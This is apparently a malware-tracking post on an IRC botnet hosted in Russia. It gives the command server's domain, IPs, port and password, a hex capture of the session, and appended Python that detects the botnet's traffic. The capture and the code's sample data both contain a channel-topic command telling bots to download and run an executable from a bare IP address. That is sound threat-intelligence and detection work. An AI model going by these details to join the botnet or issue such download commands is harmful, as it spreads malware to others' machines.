a.bestplay2010.com (botnet hosted in Russian Federation, Vline Ltd)

a.bestplay2010.com DNS_TYPE_A IPs: 109.196.142.66, 109.196.142.58
Port: 5901

109.196.142.66:5901 PASS eee

Data sent:

4b43 494b 2063 796d 7271 666a 6f0d 0a72 KCIK cymrqfjo..r
7373 7220 6d67 7670 6f79 6f79 2022 2220 ssr mgvpoyoy ""
2265 736d 2220 3a6d 6776 706f 796f 790d "esm" :mgvpoyoy.
0a .

Data received:

3a49 5243 2149 5243 4068 7562 2e75 732e :IRC!IRC@hub.us.
636f 6d20 5052 4956 4d53 4720 6379 6d72 com PRIVMSG cymr
7166 6a6f 203a 0156 4552 5349 4f4e 010d qfjo :.VERSION..
0a3a 6875 622e 7573 2e63 6f6d 2030 3031 .:hub.us.com 001
2063 796d 7271 666a 6f20 3a75 732c 2063 cymrqfjo :us, c
796d 7271 666a 6f21 6d67 7670 6f79 6f79 ymrqfjo!mgvpoyoy
404c 526f 7565 6e2d 3135 322d 3833 2d31 @LRouen-152-83-1
322d 3231 2e77 3830 2d31 332e 6162 6f2e 2-21.w80-13.abo.
7761 6e61 646f 6f2e 6672 0d0a 3a0d 0a3a wanadoo.fr..:..:
6875 622e 7573 2e63 6f6d 2030 3035 2063 hub.us.com 005 c
796d 7271 666a 6f20 0d0a 3a63 796d 7271 ymrqfjo ..:cymrq
666a 6f21 6d67 7670 6f79 6f79 404c 526f fjo!mgvpoyoy@LRo
7565 6e2d 3135 322d 3833 2d31 322d 3231 uen-152-83-12-21
2e77 3830 2d31 332e 6162 6f2e 7761 6e61 .w80-13.abo.wana
646f 6f2e 6672 204a 4f49 4e20 3a23 6470 doo.fr JOIN :#dp
690d 0a3a 6875 622e 7573 2e63 6f6d 2033 i..:hub.us.com 3
3332 2063 796d 7271 666a 6f20 2364 7069 32 cymrqfjo #dpi
203a 2164 6c20 6874 7470 3a2f 2f39 312e :!dl http://91.
3231 372e 3136 322e 3830 2f33 3435 2e65 217.162.80/345.e
7865 2070 662e 6578 6520 3120 2d73 0d0a xe pf.exe 1 -s..
3a68 7562 2e75 732e 636f 6d20 3333 3320 :hub.us.com 333
6379 6d72 7166 6a6f 2023 6470 6920 6d69 cymrqfjo #dpi mi
6e64 6572 3932 2031 3239 3533 3537 3432 nder92 129535742
360d 0a3a 6875 622e 7573 2e63 6f6d 2033 6..:hub.us.com 3
3533 2063 796d 7271 666a 6f20 4020 2364 53 cymrqfjo @ #d
7069 203a 6379 6d72 7166 6a6f 200d 0a1f pi :cymrqfjo ...

Hosting information:
http://whois.domaintools.com/109.196.142.66
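
As an added example (not part of the original post), the Python below parses the IRC lines from the capture above and flags two things a network detection could key on: client verbs that are not standard IRC commands (`KCIK` and `rssr` sit where a standard client would send `NICK` and `USER`, which is an inference from the message layout) and a channel topic (numeric 332, RPL_TOPIC) carrying a `!` command with an executable URL on a bare IP. The verb allow-list, the regex and the function names are assumptions chosen for illustration.

```python
import re

# Verbs a standard IRC client may send (assumed allow-list, RFC 1459/2812 subset).
STANDARD_VERBS = {"PASS", "NICK", "USER", "JOIN", "PART", "PING", "PONG",
                  "PRIVMSG", "NOTICE", "MODE", "QUIT", "CAP", "WHO"}
# URL whose host is a bare IPv4 address and whose path ends in an executable.
EXE_URL = re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?/\S+\.(?:exe|scr|dll)\b", re.I)

# Lines transcribed from the ASCII column of the capture above.
CLIENT_LINES = ['KCIK cymrqfjo', 'rssr mgvpoyoy "" "esm" :mgvpoyoy']
SERVER_LINES = [
    ":IRC!IRC@hub.us.com PRIVMSG cymrqfjo :\x01VERSION\x01",
    ":hub.us.com 001 cymrqfjo :us, cymrqfjo!mgvpoyoy@LRouen-152-83-12-21.w80-13.abo.wanadoo.fr",
    ":",
    ":hub.us.com 005 cymrqfjo ",
    ":cymrqfjo!mgvpoyoy@LRouen-152-83-12-21.w80-13.abo.wanadoo.fr JOIN :#dpi",
    ":hub.us.com 332 cymrqfjo #dpi :!dl http://91.217.162.80/345.exe pf.exe 1 -s",
]


def parse_irc_line(line):
    """Split one IRC message into (prefix, command, params) per RFC 1459."""
    line = line.rstrip("\r\n")
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    head, sep, trailing = line.partition(" :")
    parts = head.split()
    if not parts:  # empty or prefix-only line, as seen in the capture
        return prefix, "", []
    return prefix, parts[0], parts[1:] + ([trailing] if sep else [])


def analyze(client_lines, server_lines):
    """Return (kind, detail) findings for one captured session."""
    findings = []
    for line in client_lines:
        _, verb, _ = parse_irc_line(line)
        if verb and verb.upper() not in STANDARD_VERBS:
            findings.append(("nonstandard-client-verb", verb))
    for line in server_lines:
        _, cmd, params = parse_irc_line(line)
        # 332 = RPL_TOPIC: <nick> <channel> :<topic>
        if cmd == "332" and len(params) >= 3:
            match = EXE_URL.search(params[2])
            if params[2].startswith("!") and match:
                findings.append(("topic-download-command", f"{params[1]} {match.group(0)}"))
    return findings
```
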
